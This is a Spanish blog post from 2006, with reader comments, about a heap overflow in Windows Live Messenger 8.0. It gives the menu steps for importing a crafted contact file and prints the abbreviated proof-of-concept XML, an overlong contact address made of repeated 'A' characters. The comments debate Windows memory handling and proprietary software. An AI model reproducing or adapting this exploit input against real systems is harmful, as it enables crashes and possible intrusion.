Windows Messenger 8.0

27.jun 2006 Envía un trackback

Sigo sin entender que este tipo de vulnerabilidades, bugs o como querais llamarlo sigan teniendo efecto en pleno 2k6. Y más aún con un producto relativamente nuevo (no creo que llegue a 15 días desde su aparición) de una empresa como La Innombrable teniendo -supongo- todo un equipo de seguridad detrás de sus creaciones.

El afectado en este caso es el Windows Live Messenger 8.0 con un heap overflow estúpido pero -parece ser- efectivo. Podeis probar el exploit de la siguiente forma: 
Messenger => Menu => Contact => Import Instant Messaging Contacts =>
Select CLexploits.ctt
Como vemos, el código XML para la importación de contactos no tiene demasiada chicha: 
<?xml version="1.0"?>
<messenger>
  <service name=".NET Messenger Service">
    <contactlist>
      <contact>AAAAAA[MUCHAS_MAS_AES]AAAAAAAAAAAAAAAA@hotmail.com</contact>
    </contactlist>
  </service>
</messenger>
Me sorprende que este tipo de fallos sigan de moda, bien es cierto que estoy bastante off en programación, pero son técnicas de hace años que se deberían haber corregido. Aunque tratándose de quien se trata...


Comentarios
Gravatar reidrac@27.06.2006, 'Re: Windows Messenger 8.0'

Es que además el sistema operativo donde funciona no ayuda.

Hace años que no programo nada en windows, pero recuerdo que reservar memoria a veces ocultaba este tipo de errores (bueno, más bien buffer overflow que heap overflow) porque dependiendo del sistema (en win98 no pasaba en win2k sí) te daba más memoria de la que pedías redondeando a una página de 4kb.

Claro... tenías un error en el programa, pero si daba la casualidad de que "te pasabas" y caías en esa zona de memoria "de más", el error pasaba desapercibido.

Desde luego ya podrían pasar un mejor control de calidad a los programas (¿esta petada es en una beta?), ya que dicen que es una de las ventajas que tiene el soft privativo sobre el software libre (jua jua).

Gravatar movil@27.06.2006, 'Re: Windows Messenger 8.0'

estoy de acuerdo con reidrac XD

Gravatar Jocker@28.06.2006, 'Re: Windows Messenger 8.0'

La única ventaja que tiene el software privativo, es que para el responsable de la random(área) en cuestión, es un alivio saber que si algo gripa de forma desmesurada puede coger el teléfono y hacer venir a quien haga falta si la empresa es de mediano renombre, y en caso de no encontrar la solución culpar a la empresa vendedora de ese software delante de sus superiores que por supuesto, sólo entienden que han pagado x mil/millones de euros por algo que TIENE que funcionar (totalmente lógico).
Resumiendo, que la apuesta de las empresas por un software privativo es algo más por temas de salvar culos que por confianza corporativa... bueno, todo esto como siempre imho. Saludo a mis admiradoras que también apuntan a null xD

Gravatar juan@20.06.2008, 'Re: Windows Messenger 8.0'

esta reeee buenoooooooooooo


Escribe tu comentario
 
 
Guardar datos
Escribe tu comentario:
captcha


Intenta que tu comentario sea interesante y con información relevante al tema de la entrada. BBCodes disponibles: [url=http://direccion]texto[/url], negrita: [b]texto[/b], itálica: [i]texto[/i], subrayada: [u]texto[/u]. Para mencionar o citar a alguien (quote): [cita]texto[/cita]